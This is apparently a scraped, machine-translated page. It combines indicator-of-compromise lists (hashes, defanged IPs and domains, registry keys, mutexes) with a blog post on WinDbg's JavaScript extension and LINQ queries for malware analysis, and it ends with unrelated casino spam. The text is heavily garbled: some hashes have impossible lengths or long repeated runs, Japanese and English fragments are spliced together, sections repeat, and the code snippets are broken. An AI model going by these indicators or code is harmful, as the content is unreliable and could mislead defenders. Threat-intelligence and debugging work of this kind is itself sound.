          • N/A
          • 1470b0737d00fde7f9fed30d1a8b314715309fb71363e6eb06fa36a88c20061e
          • 18c7f1d80af84c6b22941d0a0faf3ceb1b345254917573e217342041b3eabba3
          • 1e33909178e6080fd417f24631710b3878814dfcaf447a71037c4a5e7461f3d4
          • 1f993367b585974f87a7ab1d47979c64631e586ffcfc45a4abb641249ef3c2b6
          • 2dc55ee6064851769cd403581967517abd947cc5895ae986e4ed0c4f88468cc6
          • 2ea96a2c655d5f315b8dc22929924e7760ac083b92952f7c46d8b885060bede5
          • 2ecaeaa9bc1fdd5f1f8ab0d9d775d6f606280f8a86f3c9944925a3ed39e5e26a
          • 308b3c1dc4b2d19860c4dbe0ecb3bff55e2665c0121ebecf66cd5ae10d643cdb
          • 4158285e5c3569543876349c0db59e5a8f341eed5e2795ce864d3943f04a0f6c
          • 492e76881ff64ed066405ba7550bfe1f1d38a1e464af5e07bd3cb5f44277f2f5
          • 50ee79ea155621b2bc0952e66aa451348ac393030ba11b521f55eefa5de85dd6
          • 54396b08903dccb3cea7039b505912cadbf0ef36ddf025f7c3cbf3618b3fd1ca
          • 5488a6601bac36620c48be50c3ee1c41831cac6f64aac8f7fbbfaeebe2e290e1
          • 5687568d18019b9a391437e0d2fcb2a1e36eecb0ea8cc0d143d15389d0d63fd6
          • 57e539645e32c6fe261abaa56e8dd56a9ca2ae147a2035a933bed10e1e97439a
          • 58c46b39d71971b1ce3643264918d3292607841800656cfda6f6b0b89a682a85
          • 5dab3d191197694361d12090ac15228ca26f5658412e7fa51f6afe8b2a28ff81
          • 6047bc6f35d9bda3eedd9615cdd78f873a7318a0fca92733d4ade714ee264928
          • 68edeb326a914ea915a293ada3dc534192369888908080a8a1be321f2229ba88ae
          • 6a752d266112e05196a77043058317a5a0e53151613cf067521ff93f4b904818
          • 788132452a60297f0b2736e4dd1ed7f10f69599eaba6ae93914b87eb858bb470
          • 7a9a1476d383517377cbb03e480ea1880efb51eef39e70fb5dcd29b1ab859a8c
          • 7c3f98328EEBDAFC2A245DEB4EACDC69FC69FC69FC671DA80168FCE96A7551B882B
          • coverage
          • Detected screenshot
          • AMP
          • Slet grid

          Applicable range

          Value Name: ProxyOverride

          Value Name: AutoConfigURL \ SetServiceStcpipparameters ￤SystemCurrentControlsetServiceServiceServiceStCPIRAMETERS

          \ ComposerCertificates

          Indicators of Compromise

          Applicable range

          Value Name: ProxyOverride

          Local \ 10mu_acb10_s-1-5-5-57527

          Indicators of Compromise

          • 185 [.] 165 [.] 123 [.] 206
          • 203 [.] 143 [.] 82 [.] 157
          • 136 [.] 243 [.] 80 [.] 123
          • 201 [.] 148 [.] 107 [.] 187
          • syonenjump-fun [.] com
          • TEHRANAUTOMAT [.] IR
          • www [.] tfmakeup [.] com
          • 203 [.] 143 [.] 82 [.] 157
          • 136 [.] 243 [.] 80 [.] 123
          • www [.] tfmakeup [.] com
          • TILDA [.] CC
          • %LocalAppData%Temp\suqv362h. out
          • %UserProfile%971. exe
          • %Localapdata%Tempasis-9EHP6. TMP ￤セットアップ 64. TMP。
          • sambosaxzx[.]ddns[.]net
          • %LocalAppdata%Temp \ CVR9952. TMP
          • \%Temp
          • $ 8B14C4FE8C2557A0A0A0A061CC9EDA7C97BB0F89F4AE4F64F6C1D996D4E. doc4e. doc
          • 048e2a3852452F990DA142FD74095F16DC2E419346567A988C69B3D8EE62014A
          • N/A
          • 0DDD6ECA67F679E7767D6B834AFD489009bdfed0AA0FCDE6CD3CD3CD3293F8FFE1A0BC
          • 13F7DFEB4CA314F5A738C4667968551B31A3F111EFA864C97CB36DC68932D636A
          • 168308817DF0B51A942117A0A736ECBBBBBB5642648B480808080803D0FE70C5473983D
          • 2e53F63E8AE62B54FA5CB33378ED0252F202C144DCAB869E642B96605765C2651
          • 59FB51C98A77C782FED98FD98B5292AE7C980B60069A70069A70069a39513237CDFB
          • 6c552B50DD293986580D928225C05220C4FDFC246A40EFBE514CDD119FE5
          • 6F59607F97D7242934DE29FEDD6CD1AC0EFD74C99E7CA212B68C042FFB8BF9C6
          • 8DEDF65F3F3F3F2D21CF53781E78377E779A15753BDA1F0ACE6CB3F23523C2BBBBBB977225
          • 9638653F353C805AAD3D9D7F76E91733DDC7982A517EF1260F401DE16D970FC
          • A8ECD3C1FCC6E41D4A24C4D4D8C39F1D7696A83BA28D148511E92C2FD13BFDDBF6
          • B8bf2e3308EF42D8649AA1B2A7F05E16BA8C04D4D42E495BBB1223F5FC6D7B2A0
          • 8DEDF65F3F3F3F2D21CF53781E78377E779A15753BDA1F0ACE6CB3F23523C2BBBBBB977225
          • A8ECD3C1FCC6E41D4A24C4D4D8C39F1D7696A83BA28D148511E92C2FD13BFDDBF6
          • D358C4836374C3C3C6869B731C42249FAD48AEAEF089F7959CEBB9A78B056
          • DE883059DC699081AE98BD4B295BE8972F4A3BF5E699265A977A91D8ACFBB
          • E33244791D6972DE721C5DBF114F8B2921CD5FC407A1F1B7E2319C0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D0D
          • E496c2b0549E81380E1BE0DF042C84999474071D1F3B3EC7513B40FA0E546
          • E88B14C4FE8C2557A0A0A0A0a9061CC9EDA7C97BB0F89F4F4F4AE4F64F6C1D996D4E
          • F299CB65E5C336CB1A31B5CD73948D07DD68780E7329248BFC5D0D75B43070
          • FA24A0C05815300726DD268426b28397471F067CDEDCDB2F3258DF75AF75AF169C28
          • FF7898391C17D84E6ACF87E8947bb0924815E90809CD645A1FB35D0B6A
          • Coverage
          • Screenshots of Detection
          • AMP
          • Win. malware. cgok-6854725-0
          • Indicators of Compromise
          • \Software Microsoft Windows CurrentVersion Internet Settings
          • \System
          • \Windows Applied Internet Settings ￤ゾーンマップ
          • 値名： ProxyBypass
          • Value Name: ProxyBypass AddToFavoritesInitialSelection
          • LocalZonesCacheCounterMutex
          • ローカル ZonesLockedCacheCounterMutex
          • LocalMSCTF. Asm. MutexDefault1
          • \GlobalAmInst__Runing_1（GlobalAmInst__Runing_1
          • Global
          • www[.]millesimalnonremuneration[.]site
          • \%WinDir%Srvsvc
          • %LocalAppData%LocalAppData%LocalAppData%LocalAppData%LocalAppData%LocalAppData%LocalAppData%LocalAppData%lastalive0. dat
          • %LocalAppData%\Microsoft& lt;/Windows& gt;& lt;/WebCache
          • \lsass
          • \ROUTER

          Applicable range

          Value Name: ProxyOverride

          Value Name: AutoConfigURL \ SetServiceStcpipparameters ￤SystemCurrentControlsetServiceServiceServiceStCPIRAMETERS

          02d28b601b87806ed74a5bcb9fa04d6634f3b7f9949b4393aa4379649997dc88

          Indicators of Compromise

          • 0372d2b10999c791b93b17c484ce4611f31fd833ca235276748d7ffe512601d5
          • 0492856e08c5f50c72cda713d77ade79eefd4cd89f611de92c47b4fff249db17
          • 04b6c948af264febc278760d73efafcb3fa814b659a7c811f8b2053e4e957966
          • 0509780a1a8a14666ddd7592f4a787f2b5d4bfb599b838fa4e73676fdd234e70
          • 05f245d3ef7f2e527949285fa93acd2d9e0ab7a6fb95e565798eb751d3358712
          • 216[.]119[.]181[.]170
          • 0732d16625b8f1b1a4b489cd123d1d8e1ce89cb61a71c8ef00bb1b37bd294f6e
          • 078332f7ce5dd623750c9f7b7a148e04a3f499a2abd45e9c756c63ec4906ebaa
          • 07cb4ed6fb479abb07137e49c090d623a3b21762496c98fb0885176d9702553a
          • 07dfb8670514998cda1a27e5076d9b80febc39c201d9a85652e96ca39572b8c7
          • 09be7b1275949afd71f1c26965bd079a61c7cefba97086fe3d423c7c669ca1df
          • 0aeb055d03bbc6f637944e8a82de7a36e959e3ae1ef3c9b04217ea91a9966fd7
          • 0b2eb1d35ee7076f18cfab589df2432afb4ad1af19590b15b09eb18e8e68abf2
          • 0b38bc30f470e19ff3e973f5d8b0ca196e58c7cdb49ee1ccc1769ad8422cd356
          • 0c45267be8dd1bee444bedce0f29f9c6f6537f9cc14f14eb3d189c6ab7df053a
          • 0c72e02a1a7ad5f3140c57b9e6f3650afe09692d452fff294a4658a4e33573b0
          • 0cd3b49efa9072f463402e1d5d887cf38a5d6ac1a26dacb508739c3b2e15c4d2
          • 0ce65debee6f89d18a75d99d5ee271d8cf1fe948833c657d6dc64c85666aae0f
          • 0d73b17699c07d1b2f04c8b3ec883138e1133ff9ff2f0b13dddfe04ae6e52e0b
          • 1470b0737d00fde7f9fed30d1a8b314715309fb71363e6eb06fa36a88c20061e
          • Screenshots of Detection
          • 1A4C6A9C9E4BCCE9F83776F87F158D39CB21B78EA839AFAA01ABF3F93C49A4C~Indicators of Compromise
          • \SOFTWARE\Microsoft\Office\16. 0\Outlook\Profiles\Outlook\
          • \SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\Mozilla Firefox~\SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
          • \￤SystemCurrentControlSet￤Services￤Tcpip￤Parameters
          • \Windows NT
          • \Microsoft Windows NT
          • \Software Microsoft Czech Windows Czech CurrentVersion
          • \Windows Parallel Sync
          • 8-3503835szbfhhz
          • 30NAO081CA46913z
          • 198[.]187[.]30[.]49
          • 69[.]172[.]201[.]218
          • 81[.]19[.]145[.]88
          • 94[.]46[.]164[.]14
          • 98[.]124[.]199[.]103
          • www[.]klomaxbv[.]com
          • www[.]chamberoffortune[.]com
          • www[.]holdf[.]com
          • www[.]giantbuffalo[.]win
          • www[.]quantiz[.]tech
          • www[.]ciercglabslush[.]win
          • www[.]wcqr[.]info
          • www[.]asfloorsolutions[.]com
          • www[.]i-executive[.]com
          • www[.]saintjohnmarketplace[.]com

          Applicable range

          Value Name: ProxyOverride

          Value Name: AutoConfigURL

          すべてのユーザプロファイル

          Indicators of Compromise

          • %LocalAppData%Temp\suqv362h. out
          • 0372d2b10999c791b93b17c484ce4611f31fd833ca235276748d7ffe512601d5
          • %LocalAppData%Temp\Pkz7dkzi\Cookiesnrqhbx0. exe
            • Value Name: PnpInstanceID
            • 162872c960b6e48b45ea369bfa3d258eee4f479b4b498e5255fbb4c9c269a267
            • 371a044bdd6f70866e13bf6390da862b5e50a763237d9f2fbb24819a3d861ac5
            • 40094d7e1dad49a198122dcbaa478f6ad209195afa1376ad5977e374c798fbb2
            • %Localapdata%Tempasis-9EHP6. TMP ￤セットアップ 64. TMP。
            • 734e94e32e2c0418e3216ec25e2065433caf355674867a5d55919079a6ec5938
            • 760a0c53b23f3d82ff54acb3c49b1fbe2d33d486ad7a8056be3cb7a495391758
            • N/A
            • 8acfe115a997dc4cb24fcab62c80eef8fd3580c0aa1bb2308e6326069311d0ff
            • 94969ce153aa5109f92842d9cfd6ff038623bb64b657a60ae0f8499fca60f7b5
            • 94f746c852afb96875a8099e62d57ab1f8eaddfa440a77f2f76c2123c887ea2a
            • a688df4d7ef86c28c5789a1572e7b9cf9f7175fc1432fdf87f168ba7dc9f11fb
            • b91b055bacdcaa77c6865ad46679fe9735a6eac0e052419705cd3c9323bf7dac
            • 1470b0737d00fde7f9fed30d1a8b314715309fb71363e6eb06fa36a88c20061e
            • dbb6046d50ea2889e178e37ec7fb49c247fd2ba48c699562eac6be8acf7ac4d2
            • dd2df86722edddf0d95c827fa56a737913cacde56c0d417cd706ee58b99ddb37
            • ff4d8ff268c02c8c48808a51aad0cc528fbc23aec709823347cbd03cd74cf80a
            • カバレッジ
            • 検出のスクリーンショット
            • AMP
            • スレットグリッド
            • JavaScript ブリッジで WinDbg によるマルウェア解析が容易に
            • 2019 年 2 月 18 日午前 9 時 29 分
            • はじめに
            • マルウェア研究者として、私たちはマルウェアについてより深く知るために、週に数日をマルウェアのデバッグに費やしています。OllyDbg、x64dbg、IDA Pro、Immunity Debugger など、強力で人気のあるユーザーモードツールがいくつかあります。
            • All of these debugers use scripting languages ​​to automate tasks, such as their own language, such as Python and Ollyscript. When it comes to analysis in kernel mode, there is only one option: Windows debug engine and its interface CDB, NTSD, KD, Windbg. Unfortunately, even if Windbg is the most use r-friendly among them, it is widely thought that it is one of the most use r-friendly debugger in the world.
            • The learning curve of the Windbg command is quite steep, not intuitive, and is often combined with inconsistent command syntax and outdated user interfaces. Adding a traditional Windbg script language to this equation cannot make things easier for users.
            • Thankfully, there is a new Windbg preview for Windows 10 and is in line with the latest programming environment. The preview includes a new JavaScript engine and a debug data model published through a set of JavaScript objects and functions.
            • With these new features, Windbg can use the already familiar user interface elements, as in the latest programming environment like Visual Studio. This post describes this new version of the Windbg debugger data model and a new interface of JavaScript and DX commands.
            • Debugger data model
            • The debugger data model is an expandable object model, as well as the Windbg user interface, so that many internal debugger objects can be accessed through a consistent interface.
            • Debug session
            • process
            • Process environment (eg, PEB and TEB)
            • thread
            • Module
            • Stack frame
            • handle
            • device

            Applicable range

            Value Name: ProxyOverride

            Debugger control

            Indicators of Compromise

            • Pseudo register
            • DX display formula
            • All types of objects above are published through new command DX (Display Debugger Object Model Expression). This command is used to access objects or evaluate the formula using syntax like C ++. Thanks to the addition of the NATVIS function to Windbg, the result of the DX command is displayed in an intuitive format using DML as a default output, and is displayed in a more useful way.
            • 0372d2b10999c791b93b17c484ce4611f31fd833ca235276748d7ffe512601d5
            • Drill down from to p-level name space to process
            • You can control it with the R DX command option, but if you go further below a few levels, all processes, including _eprocess Kernel object fields released as members Kernelobject in process debugger objects. You will reach the list of that property. Previous Windbg version users will be grateful for the ease of new surveys that have been used by the DX command.
            • %LocalAppData%Temp\suqv362h. out
            • Pseudo registers and internal variables are useful if you want to avoid entering the full path of the object after the DX command. Instead of Debugger. sessions [0], you can use the pseudo register@$ Cursion, which refers to the current session data model object. If you need to work in the current process, you can simply enter DX @$ Curprocess instead of long DX Debugger. sessions [0] . Process [Procid].
            • LINQ query
            • LINQ (Language Integrated Query) is a concept that is already familiar to . NET software engineers, and you can create SQ L-like query for object collection published in the DX command.
            • In normal . NET development, two syntax is available to create a LINQ type, but Windbg only supports query creation using Lambda syntax through the DX command. The LinQ query allows you to slice the collection object and extract fragments of the information you want to display.
            • The Linq function "Where" allows you to select only those objects that meet the criteria specified in the lambda expression argument passed as an argument to the function. For example, to display only processes that have the string "Google" in their name, enter:
            • dx @$cursession. Processes. Where(p => p. Name. Contains("Google")).
            • Just like SQL, the "Select" function allows you to choose which members of an object in a collection you want to display. For example, for processes filtered by the "Where" function, you can use the "Select" function to get only the process name and its ID:
            • d x-r2 @$cursession. Processes. Where(p => p. Name. Contains("Google")). Select(p => New
            • Going one level deeper into the exposed _EPROCESS kernel object, you can choose to display a subset of the handles owned by the process you are observing. For example, one way to find processes hidden by a user-mode rootkit is to enumerate the process handles of the Windows Client Server Subsystem process (csrss. exe) and compare that list with a list generated using standard process enumeration commands.
            • Before enumerating the processes created by csrss. exe, you need to find the process object for csrss. exe and switch to its context once you find it:
            • dx @$cursession. Processes. Where(p => p. Name. Contains("csrss. exe"))[pid]. SwitchTo()
            • Then, using Linq Run a query to display the path to the main module of the processes present in the csrss. exe handle table:
            • dx @$curprocess. Io. Handles. Where(h => h. Type. Contains("Process")). Select(h => h. Object. UnderlyingObject. SeAuditProcessCreationInfo. ImageFileName-> Name)
            • Since ImageFileName is a pointer to a structure of type _OBJECT_NAME_INFORMATION, you need to dereference it using an arrow to access the "Name" field, which contains the module path.
            • There are many other useful Linq queries. For example, you can count the results of a query using the "Count" function. Linq queries can also be used in the JavaScript extension, but the syntax is slightly different. An example of using Linq in JavaScript is provided later in this blog post.
            • WinDbg and JavaScript
            • The next step is to expand the Windbg JavaScript because we cover the basics of the debugger data model and the DX command to explore it. JSProvider. dll is a native Windbg extension, so that users scripts Windbg so that the data model can be accessed using the Microsoft CHAKRA JavaScript engine version. This extension is not loaded by default to Windbg process space. This is to avoid potential collisions with other JavaScrip t-based extensions.
            • JSProvider is loaded using the standard command for loading the extension:
            • . load jsprovider. dll
            • This post describes the conventional scripts created by threat researchers when analyzing malware samples, but with the JavaScript extension, developers create a Windbg extension that feels the same as existing binary extensions. Here are some things I can do. Details of the creation of JavaScrip t-based extensions can be found by investigating one of the extensions provided through the official GitHub repository of the Windbg JavaScript sample.
            • Windbg Preview has a completely functional integrated development environment (IDE) for writing JavaScript code, and developers can debug live programs and refact the code while investigating memory dumps.
            • The following Windbg commands are used to load and execute JavaScrip t-based scripts. The good news is that the command that handles JavaScrip t-based scripts is more intuitive than the troublesome standard syntax for managing Windbg scripts.
            • The . scriptload command loads JavaScript scripts and extensions to Windbg, but does not execute.
            • . scriptrun executed the loaded script.
            • The . scriptunload unloads scripts from Windbg and debugger data model namespace.
            • The . scriptlist lists all the currently loaded scripts.
            • JavaScript entry point
            • Depending on the script command used to load the script, the JavaScript provider calls one of the defined user script entry points or executes the code at the script route level.
            • From a threat research perspective, there are two main entry points. The first is a type of a scriptcaster function named Initializescript, and is called by a provider when the . scriptload command is executed. This function is usually called to initialize global variables and define constants, structures, and objects.
            • The objects defined in the initializeScript function are bridged into the debugger's data model namespace using the functions host. namespacePropertyParent and host. namedModelParent. Bridged objects can be examined using the dx command like any other native object in the data model.
            • The second, and more important, entry point is the invokeScript function, which is the equivalent of the C language's main function. This function is called when the user runs the . scriptrun WinDbg command.
            • Handy JavaScript Exploration Tricks
            • Let's assume that you have a script named "myutils. js" in which you place a set of functions that you use regularly in your day-to-day research. First, you need to load the script using the . scriptload function.
            • Loading Script Functions from the User's Desktop Folder
            • WinDbg JavaScript Modules and Namespaces
            • The main JavaScript object you use to interact with the debugger is the host object. If you are using the WinDbg Preview script editor, the IntelliSense tab completion and function documentation features can help you learn the names of the available functions and members.
            • IntelliSense in action
            • If you just want to experiment, you can put your code in an invokeScript function that is called every time you run your script. Once you are happy with your code, you can refactor it to define your own set of functions.
            • Before we dive deep into the functionality exposed through the JavaScript interface, we recommend creating two important helper functions to display text on the screen and interact with the debugger using standard WinDbg commands.
            • These functions are useful for interacting with the user or creating workarounds for functionality that doesn't yet exist natively in JavaScript, but is necessary for debugging.
            • In this example, we named these functions logme and exec. They are more or less just wrappers around JavaScript functions, but they have the advantage of not having to type out all of the namespace hierarchy.
            • Helper functions that wrap the WinDbg API for JavaScript

            Applicable range

            Value Name: ProxyOverride

            Value Name: AutoConfigURL \ SetServiceStcpipparameters ￤SystemCurrentControlsetServiceServiceServiceStCPIRAMETERS

            Display of members of the module object

            On the other hand, for-of loop statements repetitive and return all members of the repetable objects and return them. It is important to remember the difference between these two for loop statements.

            Printing the list of modules loaded in the current process space

            By repeating the link list of the loaded module of the process environment block (PEB), you can get a list of the loaded modules, but this is the javascript function host. namespace. debugger. utility. collections. Calling . fromlistentry requires preparation to convert link list into a collection. The following is a list of all the functions that convert the loaded list of the loaded module into the JavaScript sequence of the module and display the property.

            Function ListProcessmodulespeb () // FROMLISTRY Use to repeat the list of PE B-loaded modules Ity. collections. fromlistentry (host. currentprocess. kernelobject. peb. LDr. inloadordorderModulelist, "NT! _List_entry", "Flink") // _ List_entry Create a new type of object and make it _LDR_TABLE_ENTRY. ST. CreatetypedObject (Entry. address, "NT "_ Ldr_data_table_entry"); // LogMe ("Module"+host. + Loaderdata. dllbase. address. tostring (16 ) + "Size:" + Loaderdata. sizeofimage. tostring (16) "); & gt; & gt; & gt;

            This function includes a code that accesses the Host. Memory namespace, calls any of the ReadMemoryValues, ReadString, and Readwidestring functions according to the type of data to be read, and reads values ​​from the process memory.

            JavaScript 5 3-bit integer width restrictions

            Windbg programming using JavaScript is relatively simple than standard Windbg scripts, but it is necessary to pay attention to the fact that it is likely to be a seed of some headaches. One is that the integer width of JavaScript is limited to 53 bits. Therefore, the JavaScript expansion module has a special class called Host. int64, and when dealing with a 6 4-bit value, it is necessary to call the constructor. Fortunately, if a 5 3-bit overflow may occur, the interpreter will warn you.

            Host. int64 objects have several functions for executing arithmetic operations and bit operations. When trying to create a function to repeatedly process registered callbacks using the PSPCreateProcessnotifyRoutine function described later, we could not find a way to apply a 6 4-bit and bit mask. The mask function seems to return to 5 3-bit width, and if the mask is wider than 53 bits, it will overflow.

            Masking host. int64 with a 5 3-bit and mask returns correct results, and in case of incorrect results.

            • Fortunately, there are GetLowPart and Gethighpart, which returns 3 2-bit or top 3 2-bit of 6 4-bit integer. This allows you to obtain the required 6 4-bit value by applying the required and masks to be applied to the top 3 2-bit to the left and 32 bits.
            • The 5 3-bit restriction in Windbg's JavaScript implementation is annoying, and it is welcome if the Windbg team can overcome this and find a way to support 6 4-bit numbers without relying on a special JavaScript class.
            • LINQ in JavaScript
            • I have already seen a su b-set of the debugger data model object using the DX command using the DX command and how to access it.
            • However, the syntax in JavaScript is slightly different, and you must provide an expression that returns the data type you want, or an anonymous function as an argument to a Linq verb function call that returns the data type you want. For example, for the "Where" Linq clause, the value returned must be of type boolean. For the "Select" clause, you must specify either the members of the object you want to select, or a new anonymous object that consists of a subset of the queried object members.
            • Below is a simple example that uses Linq functions to filter a list of modules to only show modules that contain the string "dll" in their name, and then selectively display only the module names and their base addresses.
            • Looking up the structure of the operating system
            • If you need the actual value stored in the retrieved symbol, you must rereference the address using the host. memory. readMemoryValues ​​function or the dereference function for single values.
            • Here is an example that enumerates the callbacks registered using the documented PspCreateProcessNotifyRoutine kernel function, which registers a driver function to be notified whenever a process is created or terminated. This is also used by kernel mode malware to hide processes or to prevent the malware's user mode modules from terminating.
            • The example in this post is inspired by the C code for enumerating callbacks implemented in the SwishDbgExt extension developed by Matthieu Suiche. This WinDbg extension is very useful for analyzing kernel memory dumps as well as systems infected with kernel-mode malware.
            • This code shows that more complex functionality can be implemented relatively easily using JavaScript. In fact, developing with JavaScript is ideal for malware researchers, as you can write, test, and analyze your code all in parallel using the WinDbg Preview IDE.
            • function ListProcessCreateCallbacks() PspCreateNotifyRoutinePointer=host. getModuleSymbolAddress('ntkrnlmp', 'PspCreateProcessNotifyRoutine'); let PspCreateNotify=host. memory. readMemoryValues(PspCreateNotifyRoutinePointer, 1, 8); let PspCallbackCount=host. memory. readMemoryValues( host. getModuleSymbolAddress("ntkrnlmp", "PspCreateProcessNotifyRoutineCount"), 1, 4); logme ("There are"+PspCallbackCount. toString()+"PspCreateProcessNotify callbacks"); for (let i = 0; i
            • Here, let's look at the 6 4-bit address operation mentioned above. By splitting the 6 4-bit value to the top 3 2-bit to the lower 3 2-bit, and applying bitmask separately, the overflow of the 5 3-bit integer of JavaScript is avoided.

            Another interesting thing is that the reverse cymbol is resolved using the standard debugger command . printf. You can get the necessary symbol addresses using the JavaScript function hostmodulesymbeddress, but at the time of writing this blog post, there is no function that can get a symbol name from the address. Therefore, as a workaround, . printf is used with the%Y format designation, so that the string containing the specified symbol name is returned.

            Debug script debugging

            Developers who develop scripts in a typical language know that a series of tools that enable debugging are needed to succeed in development. The debugger needs to set a breakpoint and inspect variables and object values. This is also necessary for writing scripts that need to access various operating system structures or analyzing malware samples. Again, Windbg JavaScript extension provides necessary functions in the form of debugging tools with familiar commands for regular Windbg users.

            The debugger starts by executing the . scriptdebug command and prepares a JavaScript debugger to debug a specific script. Once the debugger loads the script, there is an option to select an event to stop the debugger as well as set a breakpoint on a specific line of the script code.

            The SXE command in the JavaScript debugger is used to define the event that the debugger breaks, like Windbg. For example, to break in the first row of the script, enter SXE EN. Once the command is performed successfully, you can use the SX command to find out the status of all available events.

            SX displays a javascript debugger break status for various exceptions.

            You can also specify a script line that uses a BP command to set a breakpoint, like a standard Windbg syntax. To set a breakpoint, the user must specify the line number and the line of the line. If the specified row is 0, the debugger automatically sets a breakpoint at the first position where the line is possible.

            Setting a breakpoint at line position 0 sets the breakpoint at the first possible position.

            Now that we have set all the necessary breakpoints, we must exit the debugger. The debugging process continues after calling the script by accessing the WinDbg variable @$scriptContents and calling a function in the script we want to debug, or by launching the script as usual with . scriptrun. Of course, the @$scriptContents variable is accessed with the dx command.

            Scripts can be launched for debugging using the @$scriptContents variable.

            The debugger includes its own JavaScript evaluation command., which allows you to evaluate JavaScript expressions and inspect the values ​​of script variables and objects.

            To inspect the display result of a JavaScript expression, use the command "?

            JavaScript debugging is a powerful tool necessary for proper development. Its capabilities are already sufficient in the initial JavaScript extension version, but we hope that its capabilities will become richer and more stable as the WinDbg preview approaches full release.

            Summary< Name=p.Name, >)

            I hope this post has provided some pointers to useful features available through the official Microsoft JavaScript WinDbg extension for malware analysis. The API exposed through JavaScript is not complete, but there are ways to work around the limitations by wrapping standard WinDbg commands and parsing their output. This solution is not ideal, and we hope that new features will be added directly to the JavaScript provider to make it more scriptable.

            The Debugging Tools for Windows development team seems to be putting all their efforts into adding new JavaScript modules. Recently, file system interaction and code namespace modules were added, opening up new possibilities for code analysis. Interested readers can check out the CodeFlow JavaScript extension available from the official examples repository on Github.

            If you would like to learn a few more tips for malware analysis using WinDbg and JavaScript, Cisco Talos has published 5 I'll be giving a session at the CARO workshop in Copenhagen in February.

            References

            dx command

            MASM and C++ WinDbg evaluators

            Linq and the debugger data model

            Reverser debugger data model

            Debugging JavaScript with WinDbg

            JavaScript debugger sample scripts

            WinDbg JavaScript script video

            DX command video

            Debugger object model video

            function ListProcessModules() //An example on how to use LINQ queries in JavaScript //Instead of a Lambda expression supply a function which returns a boolean for Where clause or let mods=host.currentProcess.Modules.Where(function (k) ) //a new object with selected members of an object we are looking at (in this case a Module) .Select(function (k) >); for (var lk of mods) logme(lk.name+" at "+lk.adder.toString(16)); > >
            >

            Conclusion

            

            Elim Rim - Journalist, creative writer

            Last modified 06.11.2024

            Black Diamond Casino Login App Sign Up Most mobile casino apps can be downloaded for free from the App Store or Google Play, they are Read more · Site Casino. Welcome to the Ghost Potato archives. You can search hundreds of comics by the year and month of publication, browse by the chronological date and the comic's. Best Casino Apps. POPULAR CASINO APPS. iPhone Casinos iPhone Best Free Slot Games for Android · Best Free iPhone Casino Games